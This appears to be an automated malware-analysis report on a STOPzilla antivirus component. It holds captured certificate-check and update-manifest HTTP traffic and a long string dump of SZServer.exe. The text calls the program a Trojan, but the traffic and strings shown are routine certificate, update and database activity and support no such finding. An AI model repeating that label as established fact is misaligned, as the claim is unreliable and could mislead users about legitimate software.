4184516Z0s0q0I0... ...................B.>.I.$&.....e......0..C9...3
13..R...%V.......K3.....20150424184516Z....20150501184516Z0...*.H.....
........|.k`.#..:..."...8....:Hu%.....Pf...sS.!.Og.....4.......R.Y..e.
.....mG.-.&.Q....}..*.S......!.^.. .&S.)..o...ij.2.....^4.D.Y..N...a..
.a.-".p_E]..M....c..9.!8.%..u<...)........z}......R.j3B..l.........
........@...!......=m....<.Ep.....,...|......1.BwP.9"........0...0.
..0...........2...'U.BM...g.B0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 Ve
riSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 P
ublic Primary Certification Authority - G50...141202000000Z..151216235
959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec
 Trust Network1?0=..U...6Symantec Class 3 PCA - G5 OCSP Responder Cert
ificate 30.."0...*.H.............0...............2&..PL...,..2....:..t
H...`JG.%..*...s.c%...?t..J..0.q....~..k@X.l.i....0..kk..h.9"1.5?..s..
...3[...u......]...R0..Z}....l..I.Y.....j\H.q...#.uw.4qz.#.J.....@2$".
.$l.B.......D.ye..(..2.........@...... ...."... E..0M,..b{.^..s'....f.
6.pr4.J........'j..........0...0...U.......0.0l..U. .e0c0a..`.H...E...
.0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.
symauth.com/rpa0...U.%..0... .......0...U...........0... .....0......0
!..U....0...0.1.0...U....TGV-B-2760...U......;O}a.!..u...au..eUNp0...U
.#..0.....e......0..C9...3130...*.H.............(.&..Dgr.Ve..#...5
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEDNHuJ72IX1vtHJpLeSTGzQ= HTTP/1.1


Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=578942, public, no-transform, must-revalidate
Last-Modified: Fri, 24 Apr 2015 18:05:06 GMT
Expires: Fri, 1 May 2015 18:05:06 GMT
Date: Sat, 25 Apr 2015 01:16:04 GMT
Connection: keep-alive
0..........0..... .....0......0...0......N$p...v....1.;..vn....2015042
4180506Z0s0q0I0... ...................F....0.yV......{&.K......&......
.3G...!}o.ri-...4....20150424180506Z....20150501180506Z0...*.H........
.....rJ1. '/.m.7.b.4.....3..k...w....w$...~w.2xx...g.i.X.{...|...X.S..
....p..sB....g...&n.Q._.d.bK..n.?Oz?.......Q...Z..7...B.F........{.ZO1
. ..e.....~..T..J.`}....>!..-.K....k........x....:.....@........ ..
'..FD3..........B4.v.6.....7._.6....n~..mp..6.I....a3.....0...0...0...
.........F...I]A(M..s@.0...*.H........0..1.0...U....US1.0...U....VeriS
ign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at h
ttps://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Sign
ing 2010 CA0...150225000000Z..150526235959Z0..1.0...U....US1.0...U....
VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1VeriSign Cla
ss 3 Code Signing 2010 OCSP Responder0.."0...*.H.............0........
.q<...A...#......A...u..Lz.............o..D.vQ%..s.......f....e../j
I.d.W.....|K;.j5...#.B%.]..~S.... .|;S.&.....N..`...5.....!D.p....M/..
 ..;j...q..`6...2.Ck..BnLHvCZn%....,.w.Ooi..z'...\.Yx......b..L...5.o.
.o..{..}.........%e.....N..._i........*Bc....:yQg.........0...0...U...
.0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisign
.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. 
by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U......
..0... .....0......0"..U....0...0.1.0...U....TGV-B-31830...*.H........
......-..^.........f.P`...s.....8.....V.......... .... B.(@-)6.Rf.
<<< skipped >>>


GET /repository/gdig2.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: certificates.godaddy.com


HTTP/1.1 200 OK
Date: Sat, 25 Apr 2015 01:15:56 GMT
Server: Apache
Last-Modified: Wed, 21 Jan 2015 00:41:10 GMT
ETag: "6c0-50d1ecfcc3580"
Accept-Ranges: bytes
Content-Length: 1728
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Connection: close
Content-Type: application/x-x509-ca-cert
-----BEGIN CERTIFICATE-----.MIIE0DCCA7igAwIBAgIBBzANBgkqhkiG9w0BAQsFAD
CBgzELMAkGA1UEBhMCVVMx.EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2R
hbGUxGjAYBgNVBAoT.EUdvRGFkZHkuY29tLCBJbmMuMTEwLwYDVQQDEyhHbyBEYWRkeSBS
b290IENlcnRp.ZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTExMDUwMzA3MDAwMFoXDTMxM
DUwMzA3.MDAwMFowgbQxCzAJBgNVBAYTAlVTMRAwDgYDVQQIEwdBcml6b25hMRMwEQYDVQ
QH.EwpTY290dHNkYWxlMRowGAYDVQQKExFHb0RhZGR5LmNvbSwgSW5jLjEtMCsGA1UE.Cx
MkaHR0cDovL2NlcnRzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkvMTMwMQYDVQQD.EypHbyB
EYWRkeSBTZWN1cmUgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IC0gRzIwggEi.MA0GCSqGSIb3
DQEBAQUAA4IBDwAwggEKAoIBAQC54MsQ1K92vdSTYuswZLiBCGzD.BNliF44v/z5lz4/OY
uY8UhzaFkVLVat4a2ODYpDOD2lsmcgaFItMzEUz6ojcnqOv.K/6AYZ15V8TPLvQ/MDxdR/
yaFrzDN5ZBUY4RS1T4KL7QjL7wMDge87Am GZHY23e.cSZHjzhHU9FGHbTj3ADqRay9vHH
Zqm8A29vNMDp5T19MR/gd71vCxJ1gO7GyQ5HY.pDNO6rPWJ0 tJYqlxvTV0KaudAVkV4i1
RFXULSo6Pvi4vekyCgKUZMQWOlDxSq7n.eTOvDCAHf jfBDnCaQJsY1L6d8EbyHSHyLmTG
FBUNUtpTrw700kuH9zB0lL7AgMB.AAGjggEaMIIBFjAPBgNVHRMBAf8EBTADAQH/MA4GA1
UdDwEB/wQEAwIBBjAdBgNV.HQ4EFgQUQMK9J47MNIMwojPX 2yz8LQsgM4wHwYDVR0jBBg
wFoAUOpqFBxBnKLbv.9r0FQW4gwZTaD94wNAYIKwYBBQUHAQEEKDAmMCQGCCsGAQUFBzAB
hhhodHRwOi8v.b2NzcC5nb2RhZGR5LmNvbS8wNQYDVR0fBC4wLDAqoCigJoYkaHR0cDovL
2NybC5n.b2RhZGR5LmNvbS9nZHJvb3QtZzIuY3JsMEYGA1UdIAQ/MD0wOwYEVR0gADAzMD
EG.CCsGAQUFBwIBFiVodHRwczovL2NlcnRzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkv.MA
0GCSqGSIb3DQEBCwUAA4IBAQAIfmyTEMg4uJapkEv/oV9PBO9sPpyIBslQj6Zz.91cxG76
85C/b LrTW C05 Z5Yg4MotdqY3MxtfWoSKQ7CC2iXZDXtHwlTxFWMMS2.RJ17LJ3lXubv
DGGqv QqG 6EnriDfcFDzkSnE3ANkR/0yBOtg2DZ2HKocyQetawi.DsoXiWJYRBuri
<<< skipped >>>


GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1
Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 05:02:25 GMT
If-None-Match: "a1132b8ef65d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com


HTTP/1.1 304 Not Modified
Content-Type: application/pkix-crl
Last-Modified: Tue, 24 Mar 2015 05:02:25 GMT
ETag: "a1132b8ef65d01:0"
Cache-Control: max-age=900
Date: Sat, 25 Apr 2015 01:16:35 GMT
Connection: keep-alive
....


GET /pki/crl/products/WinPCA.crl HTTP/1.1


Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sat, 07 Mar 2015 06:01:44 GMT
If-None-Match: "dde36a309c58d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com


HTTP/1.1 304 Not Modified
Content-Type: application/pkix-crl
Last-Modified: Sat, 07 Mar 2015 06:01:44 GMT
ETag: "dde36a309c58d01:0"
Cache-Control: max-age=900
Date: Sat, 25 Apr 2015 01:16:35 GMT
Connection: keep-alive
....


GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1


Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 05 Mar 2015 06:01:35 GMT
If-None-Match: "cf2633d6957d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com


HTTP/1.1 304 Not Modified
Content-Type: application/pkix-crl
Last-Modified: Thu, 05 Mar 2015 06:01:35 GMT
ETag: "cf2633d6957d01:0"
Cache-Control: max-age=900
Date: Sat, 25 Apr 2015 01:16:35 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Content-Type: application/pkix-crl..Last-Mo
dified: Thu, 05 Mar 2015 06:01:35 GMT..ETag: "cf2633d6957d01:0"..Cache
-Control: max-age=900..Date: Sat, 25 Apr 2015 01:16:35 GMT..Connection
: keep-alive..



GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?654c6292470e300a HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 16:17:41 GMT
If-None-Match: "804047d4e66d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com


HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Mar 2015 16:17:41 GMT
ETag: "804047d4e66d01:0"
Cache-Control: max-age=86400
Date: Sat, 25 Apr 2015 01:16:04 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Content-Type: application/octet-stream..Las
t-Modified: Tue, 24 Mar 2015 16:17:41 GMT..ETag: "804047d4e66d01:0"..C
ache-Control: max-age=86400..Date: Sat, 25 Apr 2015 01:16:04 GMT..Conn
ection: keep-alive..



GET /binaries/stopzilla/auto_installer/7.0.1.3/manifest.xml HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain
User-Agent: SZHttp/1.0
Host: download.stopzilla.com


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 2063
Content-Type: text/xml
Last-Modified: Tue, 07 Apr 2015 15:38:09 GMT
Accept-Ranges: bytes
ETag: "b7aa46d94871d01:6ec1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 25 Apr 2015 01:15:57 GMT
<?xml version="1.0" encoding="utf-8" ?>.<szmanifest schema="1
" version="7.0.1.3">...<file name="STOPzilla7.msi" location="htt
p://downloads.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/
STOPzilla7.msi" size="23516160" original_size="23516160" sha256="e179b
b743303e628c1e1f85c5ad4bf12a36e985d5e707b28ce83a78feac9d0e1" msi_versi
on="7.0.1.3" min_version="7.0.1.3" incremental="0" />...<file na
me="SZServer.exe" location="hXXp://downloads.stopzilla.com/binaries/st
opzilla/auto_installer/7.0.1.3/SZServer.bin" size="709858" original_si
ze="709858" sha256="226f560ff43434b0bdf1940d86bf9ce2dc8220545ae6357275
316446e1a6a7a6" encoding="zfzip" incremental="1" />...<file name
="STOPzilla.exe" location="hXXp://downloads.stopzilla.com/binaries/sto
pzilla/auto_installer/7.0.1.3/STOPzilla.bin" size="924330" original_si
ze="924330" sha256="eb2282a8edce7c27ef8cd285fd2c702e2936d4f7a9ededea8d
5536db94f76314" encoding="zfzip" incremental="1" />...<file name
="SZNetAssistant.exe" location="hXXp://downloads.stopzilla.com/binarie
s/stopzilla/auto_installer/7.0.1.3/SZNetAssistant.bin" size="1318507" 
original_size="1318507" sha256="3f49e7e37932dd83bb51e99230dff23f45a2fb
5de21390b63c976501fb15cd76" encoding="zfzip" incremental="1" />...&
lt;file name="SZFileAssistant.exe" location="hXXp://downloads.stopzill
a.com/binaries/stopzilla/auto_installer/7.0.1.3/SZFileAssistant.bin" s
ize="465312" original_size="465312" sha256="1ee3f0af8e312d63bc65a518a1
e94a718498dca56ab589a6353584207922e14d" encoding="zfzip" increment
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

SZServer.exe_3384:

.text
`.rdata
@.data
.rsrc
@.reloc
t.jtj
t.jpj
f;F.sA
f;H.sA
L$4f;P.sF3
.6.78.9:;
B.CDEFFG
t.jTj
t.jXj
t.jLj
t.jhj
8SQLi
n-l}<
EUu.AUu
<\>.ZH
vipre.targets.
SQLite format 3
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYWITHOUTERELEASEATTACHAVINGROUPDATEBEGINNERECURSIVEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTRIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
3.8.8.3
CREATE TEMP TABLE sqlite_temp_master(
zilla.applications.stopzilla.license.volume_serial
zilla.applications.stopzilla.license.instance_key
zilla.applications.stopzilla.license.type
home-service.phone-home.status
scan.results_xml
CSZScanStoredAction::Execute
custom.all-drives
custom.known-file-types
custom.ignore-removable
custom.cookies
custom.processes
custom.deep-processes
custom.registry
custom.all-users
custom.derivatives
custom.root-kits
custom.archives
custom.common-tactics
custom.path.
vipre.targets.out_of_date
vipre.ap.
vipre.ap.unspecified
external.url_survey
system.first_run
system.install.realtime_reboot_required
system.last.service.shutdown.time
system.last_boot_time
system.initial_ap_handled
CSZSQLDatabase::ExecuteSQL
CSZSQLDatabase::CompileSQL
</%s>
<!--%s-->
<?%s?>
<!%s>
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
os_win.c:%d: (%lu) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s%c%s
recovered %d pages from %s
recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
FOREIGN KEY constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
FOREIGN KEY
abort at %d in [%s]: %s
%s constraint failed: %s
%s constraint failed
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open table without rowid: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
%s prohibited in partial index WHERE clauses
%s prohibited in CHECK constraints
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
hex literal too big: %s
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
sqlite_stat3
sqlite_stat4
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
%s cannot use variables
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
PRIMARY KEY missing on table %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
cannot create a TEMP index on non-TEMP table "%s"
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
%s.%s
%s.rowid
unable to identify the object to be reindexed
duplicate WITH table name: %s
no such collation sequence: %s
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch - "%w" referencing "%w"
table %S has no column named %s
table %S has %d columns but %d values were supplied
%d values for %d columns
sqlite3_extension_init
unable to open shared library [%s]
sqlite3_
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
defer_foreign_keys
foreign_key_check
foreign_key_list
foreign_keys
*** in database %s ***
NULL value in %s.%s
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
column%d
%s:%d
SELECTs to the left and right of %s do not have the same number of result columns
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
no such index: %s
multiple references to recursive table: %s
circular reference: %s
table %s has %d values for %d columns
multiple recursive references: %s
recursive reference in a subquery: %s
sqlite_sq_%p
too many references to "%s": max 65535
%s.%s.%s
no such table: %s
SCAN TABLE %s%s%s
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
automatic index on %s(%s)
table %s: xBestIndex returned an invalid plan
ANY(%s)
SUBQUERY %d
TABLE %s
AS %s
PRIMARY KEY
COVERING INDEX %s
INDEX %s
USING INTEGER PRIMARY KEY
VIRTUAL TABLE INDEX %d:%s
%s.xBestIndex() malfunction
at most %d tables in a join
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
no such table column: %s.%s
operator >> (CSZVinaryData& failure
CSZApplicationPipeServer::Reply
CSZApplicationPipeServer::GetWrapper
CSZHomeServiceComponentResult::ParseTokenKey
pipe-name
key-invalid
key-inactive
key-in-use
key-mismatch
external.product
external.edition
external.affiliate_id
external.downloader_id
external.reseller_id
CSZStoredAction::Execute
CSZServiceApplication::ImportExternalConfig
client.presence.interactive
client.presence.helper
CSZAppDB::ExecuteMigrationCode
last-execute-time
last-execute-result
last-execute-result-text
stored-action.saved
never-executed
CSZApplicationPipeClient::_Execute
pipe.closed
CSZApplicationPipeClient::GetWrapper
CSZApplicationPipeClient::OnPacket
external.home_service_url
stored-action.deleted
Support
CSZHomeServiceLicense::ExtractSupport
update.binaries.full
update.binaries.incremental
u-u-uTu:u:u
SMTPErrorString
CloseEmailWindowMsg
BadUrlReplacementText
BadUrlCheckingEnabled
BadUrlActionEnum
WindowsLiveMailClientEnabled
Port
BaseURL
LogToWindowsEventLog
Password
vipre.ap.disabled
vipre.ap.enabled
vipre.ap.snoozed
vipre.targets.up_to_date
CSZPipeClient::OnReadProc
CSZPipeClient::ReadData
CSZPipeClient::ReadProc
CSZPipeClient::WriteProc
X:\sz7.0.1.3\Build7\Release\x86\SZServer.pdb
KERNEL32.dll
MsgWaitForMultipleObjectsEx
USER32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
MSVCP120.dll
RPCRT4.dll
MPR.dll
MSVCR120.dll
_calloc_crt
__crtGetShowWindowMode
_amsg_exit
_wcmdln
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
__crtSetUnhandledExceptionFilter
WTSAPI32.dll
USERENV.dll
CreateNamedPipeW
ConnectNamedPipe
WaitNamedPipeW
DisconnectNamedPipe
VERSION.dll
.?AVDelegate@CSZApplicationPipeServer@@
.?AVCSZSQLDatabase@@
.PAVbad_cast@std@@
.PAVexception@std@@
.PAVrange_error@std@@
.PAVruntime_error@std@@
.?AVListener@CSZApplicationPipeServer@@
.?AVCSZPWKeyValueNotify@@
.?AVCSZSQLStatement@@
.?AVCSZPacketPipeServer@@
.?AVCSZPipeServer@@
.?AVCSZApplicationPipeServer@@
.?AVCSZPipeClient@@
.?AVCSZPacketPipeClient@@
.?AVCSZPacketPipeConnection@@
.?AVCSZPipeConnection@@
.?AVCSZApplicationPipeClient@@
.?AV?$TSZThreadQueue@VCSZPWHttpRetryRequest@@@@
.?AV?$TSZThreadQueue@USSZPendingHTTPRequest@@@@
.?AVDelegate@?$TSZThreadQueue@VCSZPWHttpRetryRequest@@@@
.?AVDelegate@?$TSZThreadQueue@USSZPendingHTTPRequest@@@@
.?AVCSZPWHttpResponse@@
.?AVCSZPWHttpRetryRequest@@
.?AVCSZPWHttpStatus@@
.?AVCSQLMigrationStep@@
.?AVCSZPWHttpRequest@@
.?AVCSZPWHttpRetryResponse@@
.?AVCVIPREWebFilterEvents@@
.?AU_ISBWebFilterEvents@@
.?AVCSZPipeServerThread@CSZPipeServer@@
.?AVCSZPipeConnectionThread@CSZPipeConnection@@
.?AVIO@CSZPipeClient@@
.?AVCMD5Checksum@@
<config include="common.xml">
<names include="common-names.xml">
<name descriptor="log-file"><![CDATA[sz7.log]]></name>
<name descriptor="msi-log-file"><![CDATA[sz7-msi.log]]></name>
<databases default="config" include="databases.xml" />
<s><![CDATA[<Component class="{{CLASS}}" option="{{OPTION}}"><License key="{{KEY}}" /></Component>]]></s>
<name descriptor="db-file"><![CDATA[sz7.data]]></name>
<name descriptor="pipe-name"><![CDATA[sz7-pipe]]></name>
<sql><![CDATA[CREATE TABLE kv_data (key TEXT, value_type INTEGER, value_data BLOB, user TEXT DEFAULT '')]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX kv_data_key_index ON kv_data(key,user)]]></sql>
<sql><![CDATA[CREATE TABLE IF NOT EXISTS home_message(message_id INTEGER PRIMARY KEY UNIQUE NOT NULL, group_id TEXT, resource_type TEXT NOT NULL, link TEXT NOT NULL, locale TEXT NOT NULL, placement TEXT NOT NULL, width INTEGER, height INTEGER, text TEXT NOT NULL, resource TEXT NOT NULL, received_at INTEGER NOT NULL, expires_at INTEGER, read_at INTEGER, responded_at INTEGER)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX message_pk ON home_message(message_id)]]></sql>
<sql><![CDATA[CREATE INDEX message_read_k ON home_message(read_at)]]></sql>
<sql><![CDATA[CREATE INDEX message_expires_k ON home_message(expires_at)]]></sql>
<sql><![CDATA[CREATE INDEX message_type_k ON home_message(resource_type)]]></sql>
<sql><![CDATA[CREATE TABLE IF NOT EXISTS stored_actions(id TEXT PRIMARY KEY UNIQUE NOT NULL, type TEXT NOT NULL, name TEXT NOT NULL, xml TEXT NOT NULL)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX stored_id_pk ON stored_actions(id)]]></sql>
<sql><![CDATA[CREATE INDEX stored_type_k ON stored_actions(type)]]></sql>
<value name="vipre.config.scan.known-apps.reset">true</value>
<sql><![CDATA[CREATE TABLE zilla_system(value TEXT, data TEXT)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX zilla_system_index ON zilla_system(value)]]></sql>
<sql><![CDATA[REPLACE INTO zilla_system (value, data) VALUES("db_version", "1.0.0.0")]]></sql>
<sql><![CDATA[CREATE TABLE kv_data (key TEXT, value_type INTEGER, value_data BLOB)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX kv_data_key_index ON kv_data(key)]]></sql>
<sql><![CDATA[DROP TABLE IF EXISTS zilla_system]]></sql>
<sql><![CDATA[ALTER TABLE kv_data ADD COLUMN user TEXT DEFAULT '']]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS kv_data_key_index]]></sql>
<sql><![CDATA[DELETE FROM kv_data]]></sql>
<sql><![CDATA[CREATE TABLE IF NOT EXISTS home_message(message_id INTEGER PRIMARY KEY UNIQUE NOT NULL, home_id INTEGER, group_id TEXT, resource_type TEXT NOT NULL, link TEXT NOT NULL, locale TEXT NOT NULL, placement TEXT NOT NULL, width INTEGER, height INTEGER, text TEXT NOT NULL, resource TEXT NOT NULL, data TEXT, received_at INTEGER NOT NULL, expires_at INTEGER, read_at INTEGER, responded_at INTEGER)]]></sql>
<sql><![CDATA[CREATE INDEX message_home_pk ON home_message(home_id)]]></sql>
